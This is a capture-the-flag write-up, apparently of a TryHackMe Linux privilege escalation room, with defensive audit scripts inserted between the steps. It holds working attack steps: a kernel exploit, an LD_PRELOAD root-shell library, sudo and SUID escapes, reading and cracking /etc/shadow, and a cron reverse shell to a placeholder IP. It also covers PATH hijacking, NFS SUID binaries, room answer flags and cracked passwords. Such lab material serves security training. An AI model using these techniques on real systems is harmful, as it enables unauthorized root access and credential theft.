Learn the fundamentals of Linux privilege escalation. From enumeration to exploitation, get hands-on with over 8 different privilege escalation techniques.
hostname
uname -a
cat /etc/issue
python --version
searchsploit linux 3.13.0 Ubuntu 14.04
The answer is CVE-2015-1328.
Download the exploit:
searchsploit -m 37292.c
We can see that we can't create or write files in the current directory on the target system, but we can move to the /tmp directory to do it.
cd /tmp
Transfer the exploit to the target system. On the attack machine:
ifconfig
python3 -m http.server
On the target system:
wget 10.18.7.11:8000/37292.c
Compile and run the exploit:
gcc 37292.c -o abc
id
./abc
id
| Flag | flag1.txt |
|---|---|
| Answer | THM-28392872729920 |
Leverage application functions
Some applications will not have a known exploit within this context. Such an application you may see is the Apache2 server.
In this case, we can use a "hack" to leak information leveraging a function of the application. As you can see below, Apache2 has an option that supports loading alternative configuration files (-f : specify an alternate ServerConfigFile).
Loading the /etc/shadow file using this option will result in an error message that includes the first line of the /etc/shadow file.
Leverage LD_PRELOAD
On some systems, you may see the LD_PRELOAD environment option.
The C code will simply spawn a root shell and can be written as follows:
```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid/setuid */

/* Runs when the shared object is loaded via LD_PRELOAD (built with -nostartfiles). */
void _init() {
    unsetenv("LD_PRELOAD");  /* so the spawned shell does not reload this library */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
```
We can save this code as shell.c and compile it using gcc into a shared object file using the following parameters:
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
We can now use this shared object file when launching any program our user can run with sudo. In our case, Apache2, find, or almost any of the programs we can run with sudo can be used.
We need to run the program by specifying the LD_PRELOAD option, as follows:
sudo LD_PRELOAD=/home/user/ldpreload/shell.so find
This will spawn a shell with root privileges.
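As an added example (not part of the original write-up), a defender-side check for this technique: the shared-object trick only works when sudo's env_keep preserves LD_PRELOAD, so the script below parses sudoers text or `sudo -l` output and reports which loader variables survive sudo. The sample output, hostname and command list are constructed, and LD_LIBRARY_PATH is flagged alongside LD_PRELOAD for the same reason.

```python
import re

# Loader variables that let anyone with sudo rights inject code into every
# command sudo allows them. LD_PRELOAD is the one used above; LD_LIBRARY_PATH
# is flagged for the same reason (added here, not mentioned in the write-up).
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH"}

# Matches both sudoers syntax   Defaults env_keep += "LD_PRELOAD LD_LIBRARY_PATH"
# and the "Matching Defaults entries" line printed by `sudo -l`, e.g.
#   env_reset, env_keep+=LD_PRELOAD, secure_path=...
_ENV_KEEP = re.compile(r'env_keep\s*\+?=\s*(?:"([^"]*)"|([^\s,]+))')

def kept_loader_vars(text):
    """Sorted loader variables that env_keep preserves across sudo (should be empty)."""
    kept = set()
    for quoted, bare in _ENV_KEEP.findall(text):
        for var in (quoted or bare).split():
            if var in LOADER_VARS:
                kept.add(var)
    return sorted(kept)

# Constructed sample: what `sudo -l` prints on a host set up like the one above
# (hostname and command list are placeholders).
SAMPLE_SUDO_L = """\
Matching Defaults entries for user on target-host:
    env_reset, env_keep+=LD_PRELOAD, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User user may run the following commands on target-host:
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/sbin/apache2
"""

if __name__ == "__main__":
    for var in kept_loader_vars(SAMPLE_SUDO_L):
        print(f"FINDING: sudo keeps {var}; remove it from env_keep in /etc/sudoers")
```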
Okay, back to the task, which is about the sudo command:
sudo -l
flag2 is easy to get; there is no restriction on it.
| Flag | flag2.txt |
|---|---|
| Answer | THM-402028394 |
How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?
sudo nmap --interactive
The next task is to see the hash of frank's password.
You can use nano, less, or find with sudo.
sudo nano
^R^X
reset; sh 1>&0 2>&0
Or, more simply, with less:
sudo less /etc/shadow
SUID and SGID files have an "s" bit set in their permissions, showing their special permission level.
find / -type f -perm -04000 -ls 2>/dev/null
will list files that have SUID or SGID bits set.
We see that the nano text editor has the SUID bit set by running the find / -type f -perm -04000 -ls 2>/dev/null command.
nano /etc/shadow will print the contents of the /etc/shadow file. We can now use the unshadow tool to create a file crackable by John the Ripper.
To achieve this, unshadow needs both the /etc/shadow and /etc/passwd files.
The unshadow tool's usage can be seen below:
unshadow passwd.txt shadow.txt > passwords.txt
With the correct wordlist and a little luck, John the Ripper can return one or several passwords in cleartext.
The other option would be to add a new user that has root privileges. This would help us circumvent the tedious process of password cracking. Below is an easy way to do it:
We will need the hash value of the password we want the new user to have. This can be done quickly using the openssl tool on Kali Linux.
We will then add this password with a username to the /etc/passwd file.
Once our user is added (please note how root:/bin/bash was used to provide a root shell) we will need to switch to this user and hopefully should have root privileges.
Back to the task: we can see that base64 has the SUID bit set.
cat /etc/passwd
What is the password of user2?
First we need to collect the user entries for our passwd.txt file. Run base64 /etc/passwd | base64 --decode | tail -n4 in your terminal and copy the last bit into your passwd.txt file.
Next we need the password hashes for our shadow.txt file. Run base64 /etc/shadow | base64 --decode | tail -n4 in your terminal and copy the last bit into your shadow.txt file.
Next, we need to unshadow our passwords:
unshadow passwd.txt shadow.txt > passwords.txt
Finally we can use the John the Ripper tool to crack the password:
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
We can use the same trick to read flag3:
base64 /home/ubuntu/flag3.txt | base64 --decode
| Flag | flag3.txt |
|---|---|
| Answer | THM-3847834 |
List the enabled capabilities:
getcap -r / 2>/dev/null
We can see 6 binaries. One of them, view, can be used through its capabilities, and we can also use vim by its capability:
./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
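For the SUID section and the capabilities section above, an added audit script (not from the room or the write-up) that compares `find / -type f -perm -04000 -ls` output against a baseline of expected SUID binaries and flags `getcap -r /` entries carrying root-equivalent capabilities; it goes a little beyond the page by accepting both getcap output formats. The baseline, the binary paths and both sample outputs are constructed.

```python
import re

# Baseline of SUID binaries expected on a stock Ubuntu install (constructed list;
# replace it with the inventory taken from your own gold image).
SUID_BASELINE = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
}
# Capabilities that are root-equivalent when granted to an interactive program.
ROOT_EQUIVALENT_CAPS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_chown", "cap_fowner",
}

def unexpected_suid(find_ls_output, baseline=SUID_BASELINE):
    """Paths from `find / -type f -perm -04000 -ls` that are outside the baseline."""
    found = []
    for line in find_ls_output.splitlines():
        fields = line.split()
        if len(fields) < 11:
            continue                          # not a -ls record
        mode, path = fields[2], fields[-1]    # assumes paths contain no spaces
        if mode[3] in "sS" and path not in baseline:   # 's'/'S' in owner-exec slot = SUID
            found.append(path)
    return found

def risky_capabilities(getcap_output):
    """(path, caps) from `getcap -r /` with root-equivalent caps; handles the
    'path = cap_x+ep' (older libcap) and 'path cap_x=ep' (newer libcap) formats."""
    risky = []
    for line in getcap_output.splitlines():
        m = re.match(r"(\S+)\s+=?\s*(\S+)", line.strip())
        if not m:
            continue
        path, capstr = m.groups()
        caps = {c for c in re.split(r"[,+=]", capstr) if c.startswith("cap_")}
        if caps & ROOT_EQUIVALENT_CAPS:
            risky.append((path, sorted(caps & ROOT_EQUIVALENT_CAPS)))
    return risky

# Constructed samples shaped like the output of the two enumeration commands.
SAMPLE_FIND = """\
 131123 52 -rwsr-xr-x 1 root root 53040 Jan 10 2020 /usr/bin/passwd
 131124 44 -rwsr-xr-x 1 root root 44784 Jan 10 2020 /usr/bin/chsh
 131125 244 -rwsr-xr-x 1 root root 245872 Feb 21 2020 /bin/nano
 131126 40 -rwsr-xr-x 1 root root 39144 Sep  5 2019 /usr/bin/base64
"""
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/home/ubuntu/vim = cap_setuid+ep
/home/ubuntu/view cap_setuid=ep
"""
```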
| Flag | flag4.txt |
|---|---|
| Answer | THM-9349843 |
cat /etc/crontab
There are 4 cron jobs.
I can see a file backup.sh.
Change the file content to bash -i >& /dev/tcp/<your_ip>/4444 0>&1
Run a listener with netcat:
nc -vlnp 4444
I forgot to check if the script file was set to executable or not, and I kept waiting for the reverse shell and it never connected back.
I wasted hours googling, modifying my bash shell, trying to figure out why my cron job script isn’t working. I was about to give up until I noticed the permissions…
chmod +x backup.sh
OK, now we get the reverse shell with root privileges.
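The root cause here is a root cron job whose script another user can edit. As an added example (not part of the write-up), this Python audit parses /etc/crontab, checks whether each job's script or its directory is writable by someone other than the owner, and rebuilds the scenario in a temporary directory; the script names, contents and crontab lines are constructed.

```python
import os
import stat
import tempfile

INTERPRETERS = {"bash", "sh", "python", "python3"}

def cron_targets(crontab_text):
    """Yield (user, script_path) for each job in /etc/crontab (system 7-field format)."""
    for raw in crontab_text.splitlines():
        parts = raw.split()
        if not parts or parts[0].startswith("#") or "=" in parts[0]:
            continue                                 # blank, comment or VAR=value line
        if parts[0].startswith("@") and len(parts) >= 3:   # @reboot user command
            user, cmd = parts[1], parts[2:]
        elif len(parts) >= 7:                        # m h dom mon dow user command
            user, cmd = parts[5], parts[6:]
        else:
            continue
        if cmd and cmd[0] in INTERPRETERS:
            cmd = cmd[1:]                            # "root bash /opt/x.sh" -> /opt/x.sh
        if cmd and cmd[0].startswith("/"):
            yield user, cmd[0]

def writable_cron_jobs(crontab_text):
    """Jobs whose script (or its directory) can be modified by someone other than the owner."""
    findings = []
    for user, path in cron_targets(crontab_text):
        try:
            mode = os.stat(path).st_mode
        except FileNotFoundError:
            findings.append((user, path, "target missing: whoever creates it runs as " + user))
            continue
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((user, path, "script writable by group/others"))
        dmode = os.stat(os.path.dirname(path)).st_mode
        if dmode & stat.S_IWOTH and not dmode & stat.S_ISVTX:
            findings.append((user, path, "directory world-writable, script can be replaced"))
    return findings

def demo():
    """Rebuild the situation above in a temp dir: a root job running a script anyone can edit."""
    work = tempfile.mkdtemp()
    weak = os.path.join(work, "backup.sh")       # the job a low-privileged user could rewrite
    safe = os.path.join(work, "rotate.sh")       # a correctly permissioned job
    for script, mode in ((weak, 0o777), (safe, 0o755)):
        with open(script, "w") as f:
            f.write("#!/bin/bash\ntar czf /tmp/backup.tgz /home\n")   # constructed, harmless
        os.chmod(script, mode)
    crontab = f"PATH=/usr/bin:/bin\n* * * * * root {weak}\n*/5 * * * * root bash {safe}\n"
    return writable_cron_jobs(crontab)
```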
| Flag | flag5.txt |
|---|---|
| Answer | THM-383000283 |
Use the same trick to crack matt's password: 123456
Find writable folders under /home:
find / -writable 2>/dev/null | grep home
We can see 3 folders in /home.
I found flag6 under the matt folder, but let's see what is in the murdoch folder.
We see that the test binary depends on a command called thm, which means we need to create a thm file in the PATH containing a small script that reads the contents of flag6.txt:
echo "cat /home/matt/flag6.txt" > thm
chmod +x thm
export PATH=/home/murdoch:$PATH
Now run the binary so it picks up our script:
./test
| Flag | flag6.txt |
|---|---|
| Answer | THM-736628929 |
Enumerate mountable shares from our attack machine:
showmount -e 10.10.226.120
cat /etc/exports
Create a folder to work in on our machine:
mkdir /tmp/THM
cd /tmp/THM
I will mount the shared folder on /tmp/THM:
sudo mount -o rw 10.10.226.120:/home/ubuntu/sharedfolder /tmp/THM
Now the files are present on both machines.
vi nfs.c
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid/setuid */

int main() {
    setgid(0);   /* these succeed because the binary will be SUID root */
    setuid(0);
    system("/bin/bash");
    return 0;
}
```
gcc nfs.c -o nfs -w
chmod +s nfs
ls -l
You now have root access and can run:
./nfs
You will see below that both files (nfs.c and nfs) are present on the target system; we worked on the mounted share, so there was no need to transfer them.
cat /home/matt/flag7.txt
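This works because the share is exported with no_root_squash, which lets root on the client create a root-owned SUID file on the server. As an added example (not from the write-up), a small /etc/exports audit in Python that flags no_root_squash, read-write exports open to any host, the insecure option, and the "host (opts)" spacing mistake that silently applies options to every host; the sample exports file is constructed.

```python
import re

# One export entry is "host(opts)", a bare "host", or "(opts)" on its own. The last
# form is the classic typo "host (opts)": the options then apply to every host.
_ENTRY = re.compile(r"([^\s(]+)(?:\(([^)]*)\))?|\(([^)]*)\)")

def parse_exports(text):
    """Yield (path, host, options, spaced) for each entry in /etc/exports."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line:
            continue
        path, _, rest = line.partition(" ")
        for host, opts, bare_opts in _ENTRY.findall(rest):
            if host:
                yield path, host, set(filter(None, opts.split(","))), False
            else:
                yield path, "*", set(filter(None, bare_opts.split(","))), True

def insecure_exports(text):
    """Findings for exports that trust remote root or are open to any host."""
    findings = []
    for path, host, opts, spaced in parse_exports(text):
        if spaced:
            findings.append((path, host, "space before option list: options apply to all hosts"))
        if "no_root_squash" in opts:
            findings.append((path, host, "no_root_squash: remote root keeps uid 0, so SUID files it drops are trusted"))
        if host == "*" and "rw" in opts:
            findings.append((path, host, "read-write export mountable from any host"))
        if "insecure" in opts:
            findings.append((path, host, "insecure: accepts requests from unprivileged ports"))
    return findings

# Constructed /etc/exports resembling the target above (the share path comes from
# the mount command on the page; the options and the other entries are made up).
SAMPLE_EXPORTS = """\
/home/ubuntu/sharedfolder *(rw,sync,no_root_squash)
/srv/data 10.0.0.0/24(rw,sync,root_squash)   # squashes root: fine
/srv/pub 10.0.0.5 (ro)
"""
```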
| Flag | flag7.txt |
|---|---|
| Answer | THM-89384012 |
Looking around, there is an empty folder.
Enumeration:
find / -type f -perm -04000 -ls 2>/dev/null
I see base64 has the SUID bit set.
Now we will use base64 to read /etc/shadow and /etc/passwd:
base64 /etc/shadow | base64 -d
base64 /etc/passwd | base64 -d
Copy the password entries into two files (passwd.txt and shadow.txt).
Now crack the password:
sudo unshadow passwd.txt shadow.txt > cracked.txt
john --wordlist=/usr/share/wordlists/rockyou.txt cracked.txt
john --show cracked.txt
Switch to missy with the password Password1.
sudo -l -l
Now we can find the locations of our 2 flags with the sudo rights on find:
sudo find / -name "*flag*.txt"
cat flag1.
| Flag | flag1.txt |
|---|---|
| Answer | THM-42828719920544 |
Now we need root access to read the root flag, which is very easy with:
sudo find . -exec /bin/sh \; -quit
| Flag | flag2.txt |
|---|---|
| Answer | THM-168824782390238 |